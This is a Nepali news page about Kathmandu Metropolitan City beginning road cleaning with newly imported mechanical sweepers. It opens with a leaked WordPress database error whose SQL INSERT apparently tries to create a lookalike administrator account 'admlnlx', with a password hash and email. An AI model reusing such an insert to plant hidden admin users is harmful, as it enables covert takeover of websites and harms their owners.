WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpfclsdR0Nxr7VgCv4iCewrX50/uI51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 04:35:45', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ५ चैत, काठमाडौं । काठमाडौँ महानगरपालिकाले आगामी शुक्रबारदेखि ब्रुमर (यान्त्रिक कुचो) मार्फत सडक सफा गर्ने भएको छ ।
इटलीबाट काठमाडौँ ल्याइएको सफा गर्ने उक्त यन्त्र पहिलो पटक रत्नपार्कमा प्रयोग गर्न लागिएको हो । अहिले ती ब्रुमर सञ्चालन गर्न चालक र सह-चालकलाई तालीम दिने कामसँगै पाटपुर्जा जडानका क्रममा रहेको काठमाण्डौ हमानगरपालिकाले जनाएको छ ।
उक्त्त ब्रुमरले नियमित रुममा कुन कुन सडकमा सफा गर्ने भन्ने विषयमा कामपा प्रमुख विद्या सुन्दर शाक्यसँग छलफल भएको प्रवक्ता ईश्वरमान डङ्गोलले बताए ।
यसअघि विशिष्ट व्यक्तिको आवतजावत रहेका बेला सडक विभाग र महानगरपालिकाले आपसी समन्वय गर्दै विभागसँग रहेका दुई ब्रुमरले सडक सफा गरिँदै आएको थियो ।कामपासँग यसअघि रहेको एक ब्रुमर पनि काम गर्न नमिल्ने अवस्थामा रहेको पनि कामपाले जनाएको छ । गत असारमा गरिएको बोलपत्रको आधारमा उक्त यन्त्र ल्याइएको हो ।
सबै ब्रुमर अहिले राष्ट्रिय सभागृहमा राखिएको छ । पाँच ब्रुमरमध्ये चार वटा १६ टन क्षमता बराबरका तथा अर्को एउटा छ टन क्षमताका छ ।
ती ब्रुमरमा दिनमा १० किलोमिटरसम्मको धूलो सङ्कलन गर्न सक्ने क्षमताको रहेको छ । युरो मापदण्डका भनिएका उक्त ब्रुमरमा अगाडि, बीचमा र पछाडि भागको दायाँबायाँ गरी प्लास्टिकका चार ब्रससहित धूलो तान्न सक्ने शक्तिशाली पाइप जडान गरिएको छ ।